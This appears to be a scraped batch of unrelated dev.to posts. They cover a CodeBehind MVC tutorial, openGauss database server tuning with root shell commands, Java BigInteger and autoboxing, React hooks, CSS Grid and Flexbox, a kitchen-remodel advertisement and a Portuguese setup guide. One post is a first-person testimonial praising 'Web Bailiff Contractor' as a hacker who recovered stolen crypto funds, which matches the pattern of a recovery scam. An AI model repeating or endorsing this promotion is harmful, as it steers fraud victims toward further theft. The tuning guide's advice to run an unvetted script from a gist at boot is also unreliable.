> Note: We want to call a View from the Controller named `MonitorController`, whose Controller is also `MonitorController`, which causes the Controller named `MonitorController` to call itself one after another, and as a result, the program goes into a loop. Therefore, it is necessary to delete the Controller attribute in the `Monitor2.aspx` file.
If you have noticed, the `break` attribute (`@break`) has also been added to the `Monitor2.aspx` file. The `break` attribute causes the path of the View file to be ignored. In fact, the path below will no longer be directly accessible from the URL:
`example.com/Monitor2.aspx`
We change the `MonitorController` class as follows:
```csharp
using CodeBehind;
public partial class MonitorController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
MonitorModel model = new MonitorModel();
model.Name = "ASUS VG278Q";
model.Manufacturer = "ASUS";
model.ModelNumber = "VG278Q";
model.Resolution = "1920x1080";
model.RefreshRate = 144;
model.Price = 250.00m;
View("/Monitor2.aspx", model);
}
}
```
As you can see, in the Controller class above, only the `/Monitor2.aspx` path has been added to the View method.
We run the project (F5 key). After running the project, You need to add the string `/Monitor.aspx` to the URL.
If you enter the above path in the browser, you will see the following image in the browser.
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>ASUS VG278Q</title>
</head>
<body>
<h1 style="color: red;">ASUS VG278Q</h1>
<b style="color: green;">Manufacturer: ASUS</b>
<b style="color: blue;">Model Number: VG278Q</b>
<b style="color: gray;">Resolution: 1920x1080</b>
<b style="color: brown;">Refresh Rate: 144</b>
<b style="color: pink;">Price: 250.00 USD</b>
</body>
</html>
```
Requesting the View path named `Monitor.aspx` causes the Controller named `MonitorController` to be executed. The `MonitorController` Controller also initializes the View named `Monitor2.aspx` with the `MonitorModel` class and sends it to the requester.
For more practice, activate the `IgnoreViewAndModel` attribute in the Controller and see the result again. You can also add a new property such as weight to the data of the `MonitorModel` class and place it in the View and set it in the Controller.
In the next tutorial, we will use a suitable practical example for MVC to display different Views based on URL data (request).
### Related links
CodeBehind on GitHub:
https://github.com/elanatframework/Code_behind
CodeBehind in NuGet:
https://www.nuget.org/packages/CodeBehind/
CodeBehind page:
https://elanat.net/page_content/code_behind | elanatframework |
1,433,454 | openGauss MOT Server Optimization – x86 | Generally, databases are bounded by the following components – CPU – A faster CPU speeds up any... | 0 | 2023-04-12T07:44:32 | https://dev.to/tongxi99658318/opengauss-mot-server-optimization-x86-2jl0 | opengauss | Generally, databases are bounded by the following components –
CPU – A faster CPU speeds up any CPU-bound database.
Disk – High-speed SSD/NVME speeds up any I/O-bound database.
Network – A faster network speeds up any SQL\Net-bound database.
In addition to the above, the following general-purpose server settings are used by default and may significantly affect a database's performance.
MOT performance tuning is a crucial step for ensuring fast application functionality and data retrieval. MOT can utilize state-of-the-art hardware, and therefore it is extremely important to tune each system in order to achieve maximum throughput.
The following are optional settings for optimizing MOT database performance running on an Intel x86 server. These settings are optimal for high throughput workloads –
BIOS
Hyper Threading – ON
Activation (HT=ON) is highly recommended.
We recommend turning hyper threading ON while running OLTP workloads on MOT. When hyper‑threading is used, some OLTP workloads demonstrate performance gains of up to40%.
OS Environment Settings
NUMA
Disable NUMA balancing, as described below. MOT performs its own memory management with extremely efficient NUMA-awareness, much more than the default methods used by the operating system.
""
echo 0 > /proc/sys/kernel/numa_balancing
Services
Disable Services, as described below –
""
service irqbalance stop # MANADATORY
service sysmonitor stop # OPTIONAL, performance
service rsyslog stop # OPTIONAL, performance
Tuned Service
The following section is mandatory.
The server must run the throughput-performance profile –
""
[...]$ tuned-adm profile throughput-performance
The throughput-performance profile is broadly applicable tuning that provides excellent performance across a variety of common server workloads.
Other less suitable profiles for openGauss and MOT server that may affect MOT's overall performance are – balanced, desktop, latency-performance, network-latency, network-throughput and powersave.
Sysctl
The following lists the recommended operating system settings for best performance.
Add the following settings to /etc/sysctl.conf and run sysctl -p
""
net.ipv4.ip_local_port_range = 9000 65535
kernel.sysrq = 1
kernel.panic_on_oops = 1
kernel.panic = 5
kernel.hung_task_timeout_secs = 3600
kernel.hung_task_panic = 1
vm.oom_dump_tasks = 1
kernel.softlockup_panic = 1
fs.file-max = 640000
kernel.msgmnb = 7000000
kernel.sched_min_granularity_ns = 10000000
kernel.sched_wakeup_granularity_ns = 15000000
kernel.numa_balancing=0
vm.max_map_count = 1048576
net.ipv4.tcp_max_tw_buckets = 10000
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_tw_recycle = 1
net.ipv4.tcp_keepalive_time = 30
net.ipv4.tcp_keepalive_probes = 9
net.ipv4.tcp_keepalive_intvl = 30
net.ipv4.tcp_retries2 = 80
kernel.sem = 250 6400000 1000 25600
net.core.wmem_max = 21299200
net.core.rmem_max = 21299200
net.core.wmem_default = 21299200
net.core.rmem_default = 21299200
#net.sctp.sctp_mem = 94500000 915000000 927000000
#net.sctp.sctp_rmem = 8192 250000 16777216
#net.sctp.sctp_wmem = 8192 250000 16777216
net.ipv4.tcp_rmem = 8192 250000 16777216
net.ipv4.tcp_wmem = 8192 250000 16777216
net.core.somaxconn = 65535
vm.min_free_kbytes = 26351629
net.core.netdev_max_backlog = 65535
net.ipv4.tcp_max_syn_backlog = 65535
#net.sctp.addip_enable = 0
net.ipv4.tcp_syncookies = 1
vm.overcommit_memory = 0
net.ipv4.tcp_retries1 = 5
net.ipv4.tcp_syn_retries = 5
Update the section of /etc/security/limits.conf to the following –
""
<user> soft nofile 100000
<user> hard nofile 100000
The soft and a hard limit settings specify the quantity of files that a process may have opened at once. The soft limit may be changed by each process running these limits up to the hard limit value.
Disk/SSD
The following describes how to ensure that disk R/W performance is suitable for database synchronous commit mode.
To do so, test your disk bandwidth using the following
""
[...]$ sync; dd if=/dev/zero of=testfile bs=1M count=1024; sync
1024+0 records in
1024+0 records out
1073741824 bytes (1.1 GB) copied, 1.36034 s, 789 MB/s
In case the disk bandwidth is significantly below the above number (789 MB/s), it may create a performance bottleneck for openGauss, and especially for MOT.
Network
Use a 10Gbps network or higher.
To verify, use iperf, as follows –
""
Server side: iperf -s
Client side: iperf -c <IP>
rc.local – Network Card Tuning
The following optional settings have a significant effect on performance –
Copy set_irq_affinity.sh from https://gist.github.com/SaveTheRbtz/8875474 to /var/scripts/.
Put in /etc/rc.d/rc.local and run chmod in order to ensure that the following script is executed during boot –
""
'chmod +x /etc/rc.d/rc.local'
var/scripts/set_irq_affinity.sh -x all <DEVNAME>
ethtool -K <DEVNAME> gro off
ethtool -C <DEVNAME> adaptive-rx on adaptive-tx on
Replace <DEVNAME> with the network card, i.e. ens5f1 | tongxi99658318 |
1,878,573 | The BigInteger and BigDecimal Classes | The BigInteger and BigDecimal classes can be used to represent integers or decimal numbers of any... | 0 | 2024-06-05T22:46:26 | https://dev.to/paulike/the-biginteger-and-bigdecimal-classes-1eeg | java, programming, learning, beginners | The **BigInteger** and **BigDecimal** classes can be used to represent integers or decimal numbers of any size and precision. If you need to compute with very large integers or high-precision floating-point values, you can use the **BigInteger** and **BigDecimal** classes in the **java.math** package. Both are _immutable_. The largest integer of the long type is Long.MAX_VALUE (i.e., **9223372036854775807**). An instance of **BigInteger** can represent an integer of any size. You can use **new BigInteger(String)** and **new BigDecimal(String)** to create an instance of **BigInteger** and **BigDecimal**, use the **add**, **subtract**, **multiply**, **divide**, and **remainder** methods to perform arithmetic operations, and use the **compareTo** method to compare two big numbers. For example, the following code creates two **BigInteger** objects and multiplies them.
`BigInteger a = new BigInteger("9223372036854775807");
BigInteger b = new BigInteger("2");
BigInteger c = a.multiply(b); // 9223372036854775807 * 2
System.out.println(c);`
The output is **18446744073709551614**.
There is no limit to the precision of a **BigDecimal** object. The **divide** method may throw an **ArithmeticException** if the result cannot be terminated. However, you can use the overloaded **divide(BigDecimal d, int scale, int roundingMode)** method to specify a scale and a rounding mode to avoid this exception, where **scale** is the maximum number of digits after the decimal point. For example, the following code creates two **BigDecimal** objects and performs division with scale **20** and rounding mode **BigDecimal.ROUND_UP**.
`BigDecimal a = new BigDecimal(1.0);
BigDecimal b = new BigDecimal(3);
BigDecimal c = a.divide(b, 20, BigDecimal.ROUND_UP);
System.out.println(c);`
The output is **0.33333333333333333334**.
Note that the factorial of an integer can be very large. The program below gives a method that can return the factorial of any integer.

**BigInteger.ONE** (line 10) is a constant defined in the **BigInteger** class. **BigInteger.ONE** is the same as **new BigInteger("1")**.
A new result is obtained by invoking the **multiply** method (line 12). | paulike |
1,878,571 | CRYPTO CURRENCY REVERSAL; WEB BAILIFF CONTRACTOR | The world of online finance, with its promises of quick riches and easy gains, can be a complex... | 0 | 2024-06-05T22:39:20 | https://dev.to/markjameson/crypto-currency-reversal-web-bailiff-contractor-3jhh | The world of online finance, with its promises of quick riches and easy gains, can be a complex landscape. For me, that landscape turned into a nightmare when I fell prey to a ruthless scam on an exchange platform. The dizzying sum of $566,797.00, my life's savings, vanished into thin air, leaving me stranded on a desolate island of financial ruin. Desperation gnawed at me, a constant reminder of my folly and the callous disregard of the scammers who had taken everything from me. I desperately searched for a lifeline, a solution to my predicament. My online searches led me to a plethora of so-called "hackers," each promising a quick fix, a magical solution to my woes. But each encounter, each attempt to reclaim my stolen funds, ended in further disappointment and loss. It was a vicious cycle of betrayal, a relentless barrage of empty promises that only deepened my despair. Then, amidst the swirling vortex of online scams and charlatans, I stumbled upon a name that resonated with a promise of hope and redemption – Web Bailiff Contractor. Their reputation as the "best hacker on the web" was whispered in hushed tones throughout the shadowy underbelly of the digital world. I was skeptical, and cautious, but driven by a desperate need to reclaim what was rightfully mine. My initial contact with Web Bailiff Contractor was a revelation. Their professionalism and expertise were instantly evident. They understood the nuances of my situation, the intricate web of deceit that had ensnared me. They didn't offer empty promises; instead, they provided a clear roadmap, explaining the challenges and the potential pitfalls of recovering my lost funds. The wait, though agonizing, was far less excruciating than the endless cycle of scams I had endured. After just two days, Web Bailiff Contractor delivered the news that I had longed for, the news that brought a glimmer of hope back to my life. They had recovered a substantial portion of my stolen funds, a testament to their prowess in the digital realm, and their mastery of ethical hacking techniques. My experience with Web Bailiff Contractor was a turning point, a testament to the power of integrity and expertise in a digital world that can be challenging and fraught with deceit. They are more than just hackers; they are champions of justice, digital knights fighting against the forces of darkness that lurk in the shadows of the internet. I urge anyone who has fallen victim to online scams, anyone who has felt the sting of betrayal in the digital world, to reach out to Web Bailiff Contractor. They are a lifeline, a beacon of hope, a testament to the enduring power of human ingenuity and determination. The digital world can be a complex place, but Web Bailiff Contractor stands as a bastion of hope, a force for good, and a reminder that even in the darkest of times, there is always a fighting chance to reclaim what has been stolen. | markjameson | |
1,878,570 | Automatic Conversion between Primitive Types and Wrapper Class Types | A primitive type value can be automatically converted to an object using a wrapper class, and vice... | 0 | 2024-06-05T22:35:45 | https://dev.to/paulike/automatic-conversion-between-primitive-types-and-wrapper-class-types-46en | java, programming, learning, beginners | A primitive type value can be automatically converted to an object using a wrapper class, and vice versa, depending on the context. Converting a primitive value to a wrapper object is called _boxing_. The reverse conversion is called _unboxing_. Java allows primitive types and wrapper classes to be converted automatically. The compiler will automatically box a primitive value that appears in a context requiring an object, and will unbox an object that appears in a context requiring a primitive value. This is called _autoboxing_ and _autounboxing_. For instance, the following statement in (a) can be simplified as in (b) due to autoboxing.

Consider the following example:
`1 Integer[] intArray = {1, 2, 3};
2 System.out.println(intArray[0] + intArray[1] + intArray[2]);`
In line 1, the primitive values **1**, **2**, and **3** are automatically boxed into objects **new Integer(1)**, **new Integer(2)**, and **new Integer(3)**. In line 2, the objects **intArray[0]**, **intArray[1]**, and **intArray[2]** are automatically unboxed into **int** values that are added together. | paulike |
1,878,568 | Configuração de ambiente BackEnd | Este documento é para uso público e interno, tanto para pessoas que desejem trabalhar na Anuntech... | 27,615 | 2024-06-05T22:32:44 | https://dev.to/anuntech/configuracao-de-ambiente-backend-3j9k | backend, beginners, programming | > Este documento é para uso **público e interno**, tanto para pessoas que desejem trabalhar na Anuntech para já saberem um pouco sobre nosso ambiente, quanto para quem acabou de se juntar a Anuntech configurar seu novo ambiente de trabalho.
## Introdução
Nesse artigo veremos as configurações **especificas para o time de BackEnd**, antes de seguiir esse tutorial é necessário fazer as [configurações globais](https://dev.to/anuntech/configuracao-de-ambiente-de-desenvolvimento-1p6k).
## Sumário
- CLIs
- Docker
- Linguagens
- Golang
- Interfaces
- Dbeaver
## Interfaces
Todas as interfaces que usamos são encintradas na "app store" do Ubuntu:


O DBeaver é usado para se conectar ao banco de dados Postgres e conferir os dados.
## CLIs
Para as CLIs, basta seguir as instruções:
- [Docker](https://docs.docker.com/desktop/install/linux-install/)
## Linguagens
Para as linguagens, basta seguir as instruções:
- [Golang](https://go.dev/doc/install) | henriqueleite42 |
1,878,567 | Configuração de ambiente Web | Este documento é para uso público e interno, tanto para pessoas que desejem trabalhar na Anuntech... | 27,615 | 2024-06-05T22:31:42 | https://dev.to/anuntech/configuracao-de-ambiente-web-n4f | webdev, beginners, programming | > Este documento é para uso **público e interno**, tanto para pessoas que desejem trabalhar na Anuntech para já saberem um pouco sobre nosso ambiente, quanto para quem acabou de se juntar a Anuntech configurar seu novo ambiente de trabalho.
## Introdução
Nesse artigo veremos as configurações **especificas para o time de Web**, antes de seguiir esse tutorial é necessário fazer as [configurações globais](https://dev.to/anuntech/configuracao-de-ambiente-de-desenvolvimento-1p6k).
## Sumário
- Linguagens
- Node
## Linguagens
Para as linguagens, basta seguir as instruções:
- [NodeJs](https://lodejs.org/en/download/current/) | henriqueleite42 |
1,878,565 | Achieving Lifecycle in React Functional Components | How to Achieve Similar Behavior to Lifecycle Methods in React Functional Components In... | 0 | 2024-06-05T22:29:33 | https://dev.to/geraldhamiltonwicks/achieving-lifecycle-in-react-functional-components-482i | react, javascript, typescript | ### How to Achieve Similar Behavior to Lifecycle Methods in React Functional Components
In React, class-based components have been the backbone of many applications due to their robust lifecycle methods, such as `componentDidMount`, `componentWillUnmount`, and `componentDidUpdate`. These methods allow developers to perform specific actions during different phases of a component's life, making it easier to manage side effects, cleanup tasks, and updates.
With the introduction of React Hooks, functional components have gained popularity for their simplicity and flexibility. Hooks provide a way to use state and other React features without writing a class. However, developers might miss the straightforward lifecycle methods from class components. Fortunately, we can achieve the same behavior in functional components using hooks like `useEffect`. Let’s explore how to replicate these lifecycle methods in a functional component environment.
#### Mimicking `componentDidMount` with `useEffect`
The `componentDidMount` method is called once immediately after a component is mounted. This is typically used for initializing data, setting up subscriptions, or starting animations. In functional components, we can achieve this using the `useEffect` hook with an empty dependency array, ensuring the effect runs only once.
```javascript
import { ReactElement, useEffect } from "react";
export function ComponentDidMount(): ReactElement {
useEffect(() => {
console.log('Component mounted');
// Initialize data or set up subscriptions here
}, []); // Empty dependency array ensures this runs only once
return <div>Component did mount</div>;
}
```
In this example, the `useEffect` hook runs the provided function after the initial render, effectively mimicking the `componentDidMount` behavior.
#### Mimicking `componentWillUnmount` with `useEffect`
The `componentWillUnmount` method is invoked immediately before a component is unmounted and destroyed. This is where you clean up subscriptions, timers, or any other resources that need to be released. In functional components, we can replicate this using the cleanup function inside `useEffect`.
```javascript
import { ReactElement, useEffect } from "react";
export function ComponentWillUnmount(): ReactElement {
useEffect(() => {
const myTimer = setInterval(() => {
console.log('Clock tick');
}, 1000);
return () => {
// Cleanup function
clearInterval(myTimer);
console.log('Component unmounted');
};
}, []); // Empty dependency array ensures setup happens once and cleanup on unmount
return <div>Component will unmount</div>;
}
```
In this code, `clearInterval` is called in the cleanup function to stop the timer when the component unmounts, mimicking the `componentWillUnmount` method.
#### Mimicking `componentDidUpdate` with `useEffect`
The `componentDidUpdate` method is called immediately after updating occurs. This method is useful for operating on the DOM when the component has been updated, such as fetching new data based on changed props or state. We can achieve this in functional components by using `useEffect` without an empty dependency array.
```javascript
import { ReactElement, useEffect, useState } from "react";
export function ComponentDidUpdate(): ReactElement {
const [count, setCount] = useState(0);
useEffect(() => {
// Code to run on update
console.log('Component updated');
// Perform any operations that need to happen after updates
});
function addOne(): void {
setCount(count + 1);
}
function subtractOne(): void {
setCount(count - 1);
}
return (
<div>
Component did update | Count: {count}
<button onClick={addOne}>+</button>
<button onClick={subtractOne}>-</button>
</div>
);
}
```
In this example, `useEffect` runs after every render, which includes updates, effectively mimicking the `componentDidUpdate` method.
### Conclusion
React Hooks have revolutionized the way we write functional components, making them just as powerful and flexible as class-based components. By leveraging hooks like `useEffect`, we can easily replicate the lifecycle methods `componentDidMount`, `componentWillUnmount`, and `componentDidUpdate`.
This approach allows developers to maintain clean, concise code while ensuring that all necessary side effects and cleanup tasks are properly handled. Embracing these techniques will not only improve the readability and maintainability of your functional components but also ensure they behave consistently with their class-based counterparts.
By understanding and utilizing hooks effectively, you can harness the full potential of React's functional components and build more efficient, reliable applications. So, go ahead and refactor your class components to functional ones, and experience the modern, hook-based approach to lifecycle management in React. Happy coding! 🚀
| geraldhamiltonwicks |
1,878,564 | Processing Primitive Data Type Values as Objects | A primitive type value is not an object, but it can be wrapped in an object using a wrapper class in... | 0 | 2024-06-05T22:28:59 | https://dev.to/paulike/processing-primitive-data-type-values-as-objects-10o4 | java, programming, learning, beginners | A primitive type value is not an object, but it can be wrapped in an object using a wrapper class in the Java API. Owing to performance considerations, primitive data type values are not objects in Java.
Because of the overhead of processing objects, the language’s performance would be adversely affected if primitive data type values were treated as objects. However, many Java methods require the use of objects as arguments. Java offers a convenient way to incorporate, or wrap, a primitive data type into an object (e.g., wrapping **int** into the **Integer** class, wrapping **double** into the **Double** class, and wrapping **char** into the **Character** class,). By using a wrapper class, you can process primitive data type values as objects. Java provides **Boolean**, **Character**, **Double**, **Float**, **Byte**, **Short**, **Integer**, and **Long** wrapper classes in the **java.lang** package for primitive data types. The **Boolean** class wraps a Boolean value **true** or **false**. This section uses **Integer** and **Double** as examples to introduce the numeric wrapper classes. Most wrapper class names for a primitive type are the same as the primitive data type name with the first letter capitalized. The exceptions are **Integer** and **Character**.
Numeric wrapper classes are very similar to each other. Each contains the methods **doubleValue()**, **floatValue()**, **intValue()**, **longValue()**, **shortValue()**, and **byteValue()**. These methods “convert” objects into primitive type values. The key features of **Integer** and **Double** are shown in Figure below.

You can construct a wrapper object either from a primitive data type value or from a string representing the numeric value—for example, **new Double(5.0)**, **new Double("5.0")**, **new Integer(5)**, and **new Integer("5")**.
The wrapper classes do not have no-arg constructors. The instances of all wrapper classes are immutable; this means that, once the objects are created, their internal values cannot be
changed.
Each numeric wrapper class has the constants **MAX_VALUE** and **MIN_VALUE**. MAX_VALUE represents the maximum value of the corresponding primitive data type. For **Byte**, **Short**, **Integer**, and **Long**, **MIN_VALUE** represents the minimum **byte**, **short**, **int**, and **long** values. For **Float** and **Double**, **MIN_VALUE** represents the _minimum positive_ **float** and **double** values. The following statements display the maximum integer (2,147,483,647), the minimum positive float (1.4E–45), and the maximum double floating-point number (1.79769313486231570e + 308d).
`System.out.println("The maximum integer is " + Integer.MAX_VALUE);
System.out.println("The minimum positive float is " +
Float.MIN_VALUE);
System.out.println(
"The maximum double-precision floating-point number is " +
Double.MAX_VALUE);`
Each numeric wrapper class contains the methods **doubleValue()**, **floatValue()**, **intValue()**, **longValue()**, and **shortValue()** for returning a **double**, **float**, **int**, **long**, or **short** value for the wrapper object. For example,
`new Double(12.4).intValue() returns 12;
new Integer(12).doubleValue() returns 12.0;`
Recall that the **String** class contains the **compareTo** method for comparing two strings. The numeric wrapper classes contain the **compareTo** method for comparing two numbers and returns **1**, **0**, or **-1**, if this number is greater than, equal to, or less than the other number. For example,
**new Double(12.4).compareTo(new Double(12.3))** returns **1**;
**new Double(12.3).compareTo(new Double(12.3))** returns **0**;
**new Double(12.3).compareTo(new Double(12.51))** returns **-1**;
The numeric wrapper classes have a useful static method, **valueOf (String s)**. This method creates a new object initialized to the value represented by the specified string. For example,
`Double doubleObject = Double.valueOf("12.4");
Integer integerObject = Integer.valueOf("12");`
You have used the **parseInt** method in the **Integer** class to parse a numeric string into an **int** value and the **parseDouble** method in the **Double** class to parse a numeric string into a **double** value. Each numeric wrapper class has two overloaded parsing methods to parse a numeric string into an appropriate numeric value based on **10** (decimal) or any specified radix (e.g., **2** for binary, **8** for octal, and **16** for hexadecimal).
`// These two methods are in the Byte class
public static byte parseByte(String s)
public static byte parseByte(String s, int radix)
// These two methods are in the Short class
public static short parseShort(String s)
public static short parseShort(String s, int radix)
// These two methods are in the Integer class
public static int parseInt(String s)
public static int parseInt(String s, int radix)
// These two methods are in the Long class
public static long parseLong(String s)
public static long parseLong(String s, int radix)
// These two methods are in the Float class
public static float parseFloat(String s)
public static float parseFloat(String s, int radix)
// These two methods are in the Double class
public static double parseDouble(String s)
public static double parseDouble(String s, int radix)`
For example,
**Integer.parseInt("11", 2)** returns **3**;
**Integer.parseInt("12", 8)** returns **10**;
**Integer.parseInt("13", 10)** returns **13**;
**Integer.parseInt("1A", 16)** returns **26**;
**Integer.parseInt("12", 2)** would raise a runtime exception because **12** is not a binary number.
Note that you can convert a decimal number into a hex number using the **format** method. For example,
**String.format("%x", 26)** returns **1A**; | paulike |
1,875,234 | CSS Grid vs. Flexbox: Unleashing the Secrets to a Truly Responsive Website | Introduction In the world of web design, arranging elements on a page is both an art and a... | 0 | 2024-06-05T22:27:31 | https://dev.to/wafa_bergaoui/css-grid-vs-flexbox-unleashing-the-secrets-to-a-truly-responsive-website-4665 | css, frontend, webdev, development | ## **Introduction**
In the world of web design, arranging elements on a page is both an art and a science. Two of the most powerful tools available for creating responsive layouts are **CSS Grid** and **Flexbox**. While both are incredibly useful, they serve different purposes and excel in different scenarios. In this article, we’ll dive deep into the differences between CSS Grid and Flexbox, with clear, detailed explanations and code examples to help you understand when and why to use each.
## **What is CSS Grid?**
CSS Grid is a two-dimensional layout system designed to handle both columns and rows. It provides a grid-based layout that allows web developers to create complex and responsive designs with ease.
**Key Features of CSS Grid:**
1. Two-dimensional control: Manage both rows and columns.
2. Explicit and implicit grids: Define fixed and dynamic layouts.
3. Powerful alignment capabilities: Align items both within the grid and within individual cells.
**Example of CSS Grid:**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
.grid-container {
display: grid;
grid-template-columns: 1fr 1fr 1fr;
grid-gap: 10px;
}
.grid-item {
background-color: #4CAF50;
padding: 20px;
text-align: center;
color: white;
}
</style>
</head>
<body>
<div class="grid-container">
<div class="grid-item">1</div>
<div class="grid-item">2</div>
<div class="grid-item">3</div>
<div class="grid-item">4</div>
<div class="grid-item">5</div>
<div class="grid-item">6</div>
</div>
</body>
</html>
```
**When to Use CSS Grid:**
- When you need a complex layout with both rows and columns.
- When your layout needs to be responsive and adapt to different screen sizes.
- When aligning items both vertically and horizontally is crucial.
## **What is Flexbox?**
Flexbox, or the Flexible Box Layout, is a one-dimensional layout model focused on distributing space along a single axis—either horizontal or vertical. It’s designed to help with alignment, spacing, and distribution of items in a container.
**Key Features of Flexbox:**
1. One-dimensional control: Manage items in a row or a column.
2. Simple alignment and distribution: Easily align items along the main and cross axes.
3. Responsive design support: Adjust item sizes and order to fit the container.
**Example of Flexbox:**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
.flex-container {
display: flex;
justify-content: space-between;
align-items: center;
background-color: #4CAF50;
}
.flex-item {
background-color: #f1f1f1;
padding: 20px;
margin: 5px;
text-align: center;
color: black;
}
</style>
</head>
<body>
<div class="flex-container">
<div class="flex-item">1</div>
<div class="flex-item">2</div>
<div class="flex-item">3</div>
</div>
</body>
</html>
```
**When to Use Flexbox:**
- When you need a simple layout along a single axis.
- When you need to distribute space and align items within a container.
- When creating flexible and responsive design elements like navigation bars or media objects.
## **CSS Grid vs. Flexbox: Key Differences**
**- Dimension Control:**
<u>CSS Grid</u>: Two-dimensional, handling both rows and columns.
<u>Flexbox</u>: One-dimensional, handling either a row or a column.
**- Use Cases:**
<u>CSS Grid</u>: Best for complex layouts that require precise control over both axes.
<u>Flexbox</u>: Ideal for simpler, one-directional layouts and components within a page.
**- Complexity:**
<u>CSS Grid</u>: More complex but powerful, suitable for large-scale layouts.
<u>Flexbox</u>: Simpler, easier to learn, and perfect for smaller components.
**- Alignment and Spacing:**
<u>CSS Grid</u>: Offers detailed control over both horizontal and vertical alignment.
<u>Flexbox</u>: Provides excellent control over item alignment along a single axis.
## **Best Resources to Learn CSS Grid and Flexbox**
To master CSS Grid and Flexbox, you can explore the following high-quality resources:
**CSS Grid Resources**
1. [MDN Web Docs - CSS Grid Layout:](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Grid_Layout)
Comprehensive documentation and tutorials provided by Mozilla, perfect for both beginners and advanced developers.
2. [CSS-Tricks - A Complete Guide to Grid:](https://css-tricks.com/snippets/css/complete-guide-grid/)
A thorough guide with examples and practical tips on using CSS Grid, provided by CSS-Tricks.
3. [Learn CSS Grid:](https://learncssgrid.com/)
An interactive tutorial site specifically focused on CSS Grid, offering practical examples and exercises.
**Flexbox Resources**
1. [MDN Web Docs - Flexbox:](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Flexible_Box_Layout/Basic_Concepts_of_Flexbox)
Detailed documentation and tutorials on Flexbox from Mozilla, covering basic concepts to advanced usage.
2. [CSS-Tricks - A Complete Guide to Flexbox:](https://css-tricks.com/snippets/css/a-guide-to-flexbox/)
Another excellent guide from CSS-Tricks, this one focused on Flexbox, offering in-depth explanations and examples.
3. [Flexbox Froggy:](https://flexboxfroggy.com/#fr)
A fun, interactive game that teaches you how to use Flexbox through a series of increasingly challenging levels.
**Comprehensive Learning Platforms**
1. [FreeCodeCamp - Responsive Web Design Certification:](https://www.freecodecamp.org/learn/2022/responsive-web-design/)
A free, interactive learning platform that covers both CSS Grid and Flexbox as part of its responsive web design certification.
2. [Grid by Example:](https://gridbyexample.com/)
A collection of examples and tutorials on CSS Grid Layout created by Rachel Andrew, a leading expert in the field.
## **Conclusion**
Both CSS Grid and Flexbox are essential tools in a web developer’s toolkit. Understanding their differences and respective strengths allows you to choose the right tool for the job, ensuring your layouts are both robust and responsive. By mastering both CSS Grid and Flexbox, you’ll be well-equipped to tackle any web design challenge that comes your way. | wafa_bergaoui |
1,878,562 | Transform Your Home with a Stunning Kitchen Remodel | The kitchen is often referred to as the heart of the home, a place where meals are crafted, memories... | 0 | 2024-06-05T22:26:12 | https://dev.to/remodeling/transform-your-home-with-a-stunning-kitchen-remodel-33mf |
The kitchen is often referred to as the heart of the home, a place where meals are crafted, memories are made, and family and friends gather. A well-executed kitchen remodel can breathe new life into your home, enhancing both functionality and aesthetics. Whether you're looking to modernize your space or create a cozy, rustic retreat, a kitchen remodel offers endless possibilities.
Setting the Stage: Planning Your Dream Kitchen
The first step in a successful kitchen remodel is meticulous planning. Begin by envisioning your ideal kitchen and identifying your primary goals. Are you seeking more storage, better workflow, or a complete design overhaul? Consider your cooking habits, entertaining needs, and family dynamics. This is the time to dream big, gather inspiration, and set a realistic budget.
Engaging a professional designer can be invaluable. They bring expertise in space planning, material selection, and the latest design trends. From sleek, minimalist designs to warm, farmhouse styles, a designer can help translate your vision into a functional blueprint.
The Backbone of Design: Layout and Functionality
A kitchen’s layout is crucial to its functionality. The classic work triangle, which positions the sink, stove, and refrigerator in a triangular formation, remains a popular guideline. However, modern kitchens often incorporate work zones tailored to specific tasks like prep, cooking, and cleanup.
Open-concept layouts continue to dominate, offering seamless integration with adjacent living spaces. This design not only enhances sociability but also allows natural light to flood the kitchen, creating a bright and welcoming atmosphere.
Choosing the Right Materials: Durability Meets Style
Material selection plays a pivotal role in both the aesthetics and longevity of your kitchen. Countertops, cabinetry, and flooring should be chosen for durability and style. Quartz and granite countertops offer resilience and a high-end look, while butcher block adds warmth and charm.
For cabinetry, solid wood provides timeless appeal, but engineered options like MDF (medium-density fiberboard) offer affordability and versatility. Don’t forget about hardware – handles and knobs are small details that can significantly impact the overall design.
Adding the Finishing Touches: Appliances and Lighting
Modern appliances not only improve functionality but also add a sleek, high-tech vibe to your kitchen. Consider energy-efficient models to save on utility bills and reduce your environmental footprint. Built-in appliances, like wall ovens and integrated refrigerators, can streamline the look and maximize space.
Lighting is another critical element. A combination of ambient, task, and accent lighting can create a layered effect, enhancing both practicality and ambiance. Pendant lights over an island or under-cabinet lighting can make a dramatic difference.
The Transformation: Enjoying Your New Space
Once the dust settles and the remodel is complete, you’ll be left with a transformed kitchen that elevates your home’s value and your everyday living experience. Regular maintenance, such as sealing countertops and cleaning appliances, will keep your kitchen looking pristine.
In conclusion, a kitchen remodel is a substantial investment that offers significant rewards. With thoughtful planning, quality materials, and expert execution, you can create a space that reflects your style and meets your needs, turning your kitchen into the true heart of your home.
Read More:
https://castleremodeling.net/
https://castleremodeling.net/kitchen-remodel/
https://maps.app.goo.gl/idpwgUkFFM6fsqgY6 | remodeling | |
1,878,560 | Configuração de ambiente de desenvolvimento | Este documento é para uso público e interno, tanto para pessoas que desejem trabalhar na Anuntech... | 27,615 | 2024-06-05T22:25:45 | https://dev.to/anuntech/configuracao-de-ambiente-de-desenvolvimento-1p6k | webdev, beginners, programming | > Este documento é para uso **público e interno**, tanto para pessoas que desejem trabalhar na Anuntech para já saberem um pouco sobre nosso ambiente, quanto para quem acabou de se juntar a Anuntech configurar seu novo ambiente de trabalho.
## Introdução
Nesse artigo veremos as configurações **globais** usadas por todos os times dentro da Anuntech.
Configurações especificas por time:
- [BackEnd](https://dev.to/anuntech/configuracao-de-ambiente-backend-359c)
- [Web](https://dev.to/anuntech/configuracao-de-ambiente-web-1fnp)
## Sumário
- OS
- Ubuntu
- CLIs
- Git
- Git Config
- Interfaces
- VSCode
- Postman
- Contas em websites
- Google
- GitHub
- SSH Keys
- Slack
- Linear
## OS
